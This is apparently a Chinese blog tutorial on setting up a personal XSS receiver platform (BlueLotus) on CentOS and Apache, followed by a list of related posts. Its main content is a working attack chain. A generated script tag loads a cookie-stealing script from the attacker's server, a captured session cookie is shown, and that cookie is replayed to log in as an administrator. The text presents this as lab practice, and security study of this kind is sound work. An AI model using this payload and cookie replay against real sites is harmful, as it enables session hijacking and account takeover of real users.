一、前言

本平台是个人轻量级XSS测试平台,仅作为练习参考。

二、实验环境

服务器操作系统:Centos 7

Web容器:Apache

三、平台搭建过程

安装Apache

安装PHP

安装Git工具

从GitHub克隆XSS平台源码

# 删除默认网站内容

rm  -rf  /var/www/*

# 创建新的网站目录

mkdir  /var/www/xss

从GitHub克隆xss测试源码(https://github.com/firesunCN/BlueLotus_XSSReceiver.git)

git  clone  https://github.com/firesunCN/BlueLotus_XSSReceiver.git  /var/www/xss/

# 给xss目录

chmod  -R  777  /var/www/xss/

配置Apache

# 创建虚拟主机配置文件夹

mkdir  /etc/httpd/conf/vhost

# 创建并编辑虚拟机配置文件

vi  /etc/httpd/conf/vhost/httpd-vhosts.conf

添加以下内容:

<VirtualHost *:80>

DocumentRoot "/var/www/xss"

DirectoryIndex admin.php

</VirtualHost>

# 编辑httpd.conf文件

vi  /etc/httpd/conf/httpd.conf

# 允许使用 .htaccess文件

# 添加之前创建的虚拟主机

Include  /etc/httpd/conf/vhost/httpd-vhosts.conf

# 开机启动Apache服务

chkconfig  httpd  on

# 重新加载Apache配置文件

systemctl  start  httpd

回到浏览器访问服务器结果显示无法访问网站,经过排查是防火墙拦了。

# 命令行配置防火墙开放80端口

firewall-cmd --zone=public --add-port=80/tcp --permanent

# 重启防火墙

systemctl  restart  firewalld

安装XSS平台

# 访问服务器ip地址,点击安装

# 主要修改后台登录密码和数据加密密码,其余保持默认,然后提交

若报错则手动安装,手动安装步骤:

# 首先切换到网站跟目录

cd  /var/www/xss

# 将配置文件改名

mv  config_sample.php   config.php

# 删除install.php文件

rm  -f  install.php

# 若要修改密码信息只需修改config.php文件

安装成功,点击登录

成功登录

功能测试

# 点击我的JS,插入模板,选择Defualt.js,修改网站服务器ip地址

http://192.168.75.129/index.php

# 生成payload

<script src="http://192.168.75.129/myjs/cookie.js"></script>

# 成功获取用户cookie

ASPSESSIONIDCQBSTQBB=BHILNFDBLNPBDMOBFPHNOFBJ

# 利用Google浏览器插件edit this cookie修改cookie登录

到此存储型xss注入获取管理员cookie并登录已经圆满完成。

构造个人轻量级XSS平台获取管理员cookie并登录的更多相关文章

  1. 从零开始搭建轻量级个人XSS平台

    一. 前言 决定搭建XSS平台是因为自己想深入学习一下XSS相关的知识,多多进行实践,上网搜索了一下XSS平台有很多,但是总觉得不是很安全,这个毕竟敏感信息要传输到陌生人的服务器上,而且服务器端测试代 ...

  2. 【web安全】第一弹:利用xss注入获取cookie

    首先一定要先来吐槽一下tipask系统.这是一枚开源的类似百度知道的系统,但是漏洞多多,最基本的XSS注入都无法防御. 言归正传: [准备1] cookie接收服务器. 平时喜欢用sae,所以在sae ...

  3. xss实现获取网站源码

    当网站cookie设置了httponly,xss获取不到到网站的cookie.但是我们是可以获取到网站后台的url. 这时候我们可以xss得到网站后台源码,从而找到网站后台的一些敏感操作:添加用户,删 ...

  4. xss小结-从xss平台搭建到csp规则

    0x00前言 xss是跨站脚本攻击,利用嵌入js代码达到‘控制’对方浏览器的作用,测试的时候我们是用alert(1)弹窗,而做CTF也好,实际中的漏洞利用也好一般是用xss获取管理员的cookie 0 ...

  5. 使用Django简单编写一个XSS平台

    1) 简要描述        原理十分简单2333,代码呆萌,大牛勿喷 >_< 2) 基础知识 XSS攻击基本原理和利用方法 Django框架的使用 3) Let's start 0x01 ...

  6. XSS平台简单使用

    XSS常用语句及编码绕过 XSS常用的测试语句有: <script>alert(1)</script> <img src=x onerror=alert(1)> & ...

  7. 利用VBA+OO4O构造CTAIS开放式通用平台

    利用VBA+OO4O构造CTAIS开放式通用平台 2010-06-08 14:59:28 | 来源:税务信息化论文集 | 作者:于非 易飞 摘  要:文立足于CTAIS系统体系,探讨如何通过OO4O技 ...

  8. 鸡肋点搭配ClickJacking攻击-获取管理员权限

    作者:jing0102 前言 有一段时间没做测试了,偶尔的时候也会去挖挖洞.本文章要写的东西是我利用ClickJacking拿下管理员权限的测试过程.但在说明过程之前,先带大家了解一下ClickJac ...

  9. web安全后渗透--XSS平台搭建及使用

     xss平台搭建 1.申请一个云主机来进行建站:149.28.xx.xx 2.安装lnmp: wget http://soft.vpser.net/lnmp/lnmp1.5.tar.gz -cO ln ...

随机推荐

  1. python 3.x 爬虫基础---正则表达式

    python 3.x 爬虫基础 python 3.x 爬虫基础---http headers详解 python 3.x 爬虫基础---Urllib详解 python 3.x 爬虫基础---Requer ...

  2. ubuntu上使用ufw配置管理防火墙

    在Linux上使用ufw配置管理防火墙 UFW,即简单防火墙uncomplicated firewall,是一个 Arch Linux.Debian 或 Ubuntu 中管理防火墙规则的前端.UFW ...

  3. PHP 类与对象 全解析(三)

    目录 PHP 类与对象 全解析( 一) PHP 类与对象 全解析( 二) PHP 类与对象 全解析(三 ) 13.魔术方法 定义:PHP把所有以__(两个下划线)开头的类方法当成魔术方法     __ ...

  4. Spring boot应用踩坑集锦

    Spring boot应用踩坑集锦 spring boot是spring的一种开发套件,是spring cloud的基础框架,要学习spring cloud微服务是绕不开的,遇到一些踩坑问题在这里记录 ...

  5. 键盘输入,输出int数组的函数

    public class function { public static void main(String[] args) { //输入数组数据(例如10个) int [] array = inPu ...

  6. MySQL6:视图

    什么是视图 数据库中的视图是一个虚拟表.视图是从一个或者多个表中导出的表,视图的行为与表非常相似,在视图中用户可以使用SELECT语句查询数据,以及使用INSERT.UPDATE和DELETE修改记录 ...

  7. CPU执行程序的原理(简化过程)

    前言 看了网上的一些描述CPU执行程序的过程,发现他们涉及到的内容太多了,恨不能把整个CPU的底层结构都拿出来说,这对计算机理论知识匮乏的新人甚至是一些老人都是非常不友好的.这个问题也是当初拦在我面前 ...

  8. --num 与 num-- 的区别

    递增++和递减--操作符都属于一元操作符. 只能操作一个值的运算符是一元操作符,一元操作符是ECMscript中最简单的操作符. 递增.递减操作符介绍 递增.递减操作符有两个版本:前置型和后置型.顾名 ...

  9. 【代码笔记】iOS-iphone开发之获取系统字体

    代码: - (void)viewDidLoad { [super viewDidLoad]; // Do any additional setup after loading the view. NS ...

  10. CSS选择器之伪类选择器(元素)

    :first-child 选择某个元素的第一个子元素(IE6不支持) :last-child 选择某个元素的最后一个子元素 :first-of-type [CSS3]选择一个上级元素下的第一个同类子元 ...